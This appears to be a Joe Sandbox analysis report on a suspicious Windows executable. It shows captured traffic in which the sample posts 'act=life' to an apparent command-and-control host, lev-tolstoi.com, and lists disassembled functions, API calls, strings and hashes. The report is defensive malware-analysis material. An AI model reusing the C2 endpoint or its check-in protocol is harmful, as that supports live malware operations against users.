2024-12-26 11:45:16 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-26 11:45:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 11:45:16 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:45:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5lvdp3l7n95q7uoqkbr2osqnt9; expires=Mon, 21 Apr 2025 05:31:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ib%2BsbYqJxu0b8eHASf5GiJz2mJzZSq4czaomwioS6lsENhXM3kJpTN6SvHhjfgcvdMThGv5InJTeY9L1AzwSV%2BbFFHv%2B54TPjOt%2FlrDQraPa2NKrBv0O4Gd%2F92BffRKcLU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80d2dd09c4f3bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1773997&cwnd=80&unsent_bytes=0&cid=93a630a1a6b9e0e4&ts=765&x=0"
2024-12-26 11:45:16 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 11:45:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:45:07
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\Ebgl8jb6CW.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ebgl8jb6CW.exe"
Imagebase:	0x170000
File size:	1'820'672 bytes
MD5 hash:	F45C38F2402423AA924B4B40E8487483
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.9%
Total number of Nodes:	73
Total number of Limit Nodes:	4

Executed Functions

Function 0017B100 Relevance: 19.2, Strings: 15, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9]_, xrefs: 0017B28F
D!M#, xrefs: 0017B1F9
.AtC, xrefs: 0017B249
Gq\s, xrefs: 0017B2C1
pE}G, xrefs: 0017B253
XyR{, xrefs: 0017B2D5
k=W?, xrefs: 0017B23F
Ym]o, xrefs: 0017B2B7
zMzO, xrefs: 0017B267
yQrS, xrefs: 0017B271
S%U', xrefs: 0017B203
hI2K, xrefs: 0017B25D
Gu@w, xrefs: 0017B2CB
(Y6[, xrefs: 0017B285
b6j4, xrefs: 0017B57D

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
API String ID: 0-620192811
Opcode ID: 390f1136768162442e153c4fa0dbf112fa049d6fc54cd653f8607d97214ea7f9
Instruction ID: 9215fb2a6b1e4f1f081504e7cba05fcd20ba87b83cfacae3b98d5a3f5760dd2f
Opcode Fuzzy Hash: 390f1136768162442e153c4fa0dbf112fa049d6fc54cd653f8607d97214ea7f9
Instruction Fuzzy Hash: 190255B1204B01DFD724CF25D891B9BBBF1FB49314F508A2CE5AA8BAA0D735A445CF50

Function 00178600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00178A4B

Part of subcall function 0017B7B0: FreeLibrary.KERNEL32(00178A31), ref: 0017B7B6
Part of subcall function 0017B7B0: FreeLibrary.KERNEL32 ref: 0017B7D7

Strings

}, xrefs: 0017890C
b]u), xrefs: 00178877
}, xrefs: 00178913

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: FreeLibrary$ExitProcess
String ID: b]u)$}$}
API String ID: 1614911148-2900034282
Opcode ID: 8125a05468dc0f4ba1a818976c7044a0174a0e0d3b95c234cf2252b7e194419d
Instruction ID: 1e30ea1e595edb3ee1a5a2dc68e98a35c7d377f23e2313a0c2e854976964233e
Opcode Fuzzy Hash: 8125a05468dc0f4ba1a818976c7044a0174a0e0d3b95c234cf2252b7e194419d
Instruction Fuzzy Hash: F5C1F673E587144BC718DF69C84125AF7E6ABC4710F0EC52EA898EB391EA74DC058BC2

Function 001AE110 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(001B148A,?,00000018,?,?,00000018,?,?,?), ref: 001AE13E

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 001B1720 Relevance: 1.4, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=<32, xrefs: 001B176D

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: InitializeThunk
String ID: =<32
API String ID: 2994545307-852023076
Opcode ID: 0ecc75f89ef45341d3052eef97e639d25890395c69d682f5cf80666f94ede118
Instruction ID: c8ba8c6258b20541592fe77edbabe305039d1d6b3d4076e09079f934d9176294
Opcode Fuzzy Hash: 0ecc75f89ef45341d3052eef97e639d25890395c69d682f5cf80666f94ede118
Instruction Fuzzy Hash: BA316A79604304BBE7149E54DCF1BBBB3A6FB84750F59862CE584572D0DB30DC908782

Function 00178A50 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
Instruction ID: 539810e681c3de00431c020816ea671643e2c70eb7809d7fb061ac72169ee610
Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
Instruction Fuzzy Hash: 0021B337A627184BD3108E54DCC87917761E7D9328F3E86B889249F392C97BA91386C0

Function 00179D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000), ref: 00179D98
LoadLibraryExW.KERNEL32(?,00000000), ref: 00179E78

Strings

CK , xrefs: 00179E85

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: LibraryLoad
String ID: CK
API String ID: 1029625771-2776521869
Opcode ID: 81ec6894e161f3a6b3e9578d8c2ffd79ed7eccc574080f047e02ebd39f78500d
Instruction ID: 1b8bd18a808c7c00f73d8a81bf0433be6b923264c018b7f1bff32f88aa575c94
Opcode Fuzzy Hash: 81ec6894e161f3a6b3e9578d8c2ffd79ed7eccc574080f047e02ebd39f78500d
Instruction Fuzzy Hash: 3341E174D003409FEB159F7899D6A9A7FB1EB06324F50529CD4902F3A6C731940ACBE2

Function 0017EF53 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0017F09D

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 232d161f14d6abc032a96e2ac97c4958557d3dd3ac6dfd9185d4e34ab78dd117
Instruction ID: a30b57d891c713776b45e67568e276ac729bc4011f68b7dc071905b589638be9
Opcode Fuzzy Hash: 232d161f14d6abc032a96e2ac97c4958557d3dd3ac6dfd9185d4e34ab78dd117
Instruction Fuzzy Hash: 1241C6B4910B40AFD370EF3D994B713BEB8AB05250F504B1EF9E6866D4E231A4198BD7

Function 001AE0A0 Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 001AE0E0

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9560a13a35e3d4655366ca4df0ff8ec51914e39781e6d98edbf9ef48791ac7bc
Instruction ID: 75f70a9f85d60336e01c251b8abb70373513ee541d0eb3f03fef3ec1f949fa9e
Opcode Fuzzy Hash: 9560a13a35e3d4655366ca4df0ff8ec51914e39781e6d98edbf9ef48791ac7bc
Instruction Fuzzy Hash: 9FF0E536A14222FBC3102F38BE06A573AE4EFD3720F060438F40496125DF34E85785A1

Function 0017EC77 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0017ECA2

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 241d487c3cd289883d56a6fa7cdf3b2e95d69e611e38bd4c088b6552b9a07646
Instruction ID: 24dad0f2f0948a75d7c059ea178bb06a3d214f46c8e8c9194db1e8a86523ef89
Opcode Fuzzy Hash: 241d487c3cd289883d56a6fa7cdf3b2e95d69e611e38bd4c088b6552b9a07646
Instruction Fuzzy Hash: 40E06C347DA3817AF6B987149CA3F2521165B42F25E345304B7213E6D5CAD43141811D

Function 00179EB7 Relevance: 1.5, APIs: 1, Instructions: 18
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00179ED2

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: f1fa286f063347325655cd51008a483e8070452e81d5770ba82a1820e59fb8d7
Instruction ID: 2a0014354f361f05514a021ad556e90f53c12b24e288b8364f4f46de92092ffd
Opcode Fuzzy Hash: f1fa286f063347325655cd51008a483e8070452e81d5770ba82a1820e59fb8d7
Instruction Fuzzy Hash: B1E02B336806029BD700EB70EC47F493397EB163417068528E205C1672EB739450DA10

Function 001AC570 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,001AE0F9), ref: 001AC590

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 915e6b323bb66fd20fe855877c47c6c9e5b74a37af9ef05a119cdff4908e6bde
Instruction ID: f5a94a5b0dd29efbe8a2c7f6f46f4cf09d9e1239bf6b81928e95d892c03eed85
Opcode Fuzzy Hash: 915e6b323bb66fd20fe855877c47c6c9e5b74a37af9ef05a119cdff4908e6bde
Instruction Fuzzy Hash: 03D0C931815132EBC6102F68BC05BC73B549F5A720F070891F504AA474C764ECD2CAD0

Function 001AC55C Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 001AC561

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ecc4295c155999df782ac81cc07286794f136549a02b51d0a3e43fd00988e34
Instruction ID: 400ae9e03362d88eec2e24ec401a569ca4a8f76373cf5a9a13ca0e75a533c66e
Opcode Fuzzy Hash: 1ecc4295c155999df782ac81cc07286794f136549a02b51d0a3e43fd00988e34
Instruction Fuzzy Hash: 10A001711842209BDA562B24BC09F847A21AB59625F124191E501994B68671D8929A94

Function 001C91E9 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 001C9D90

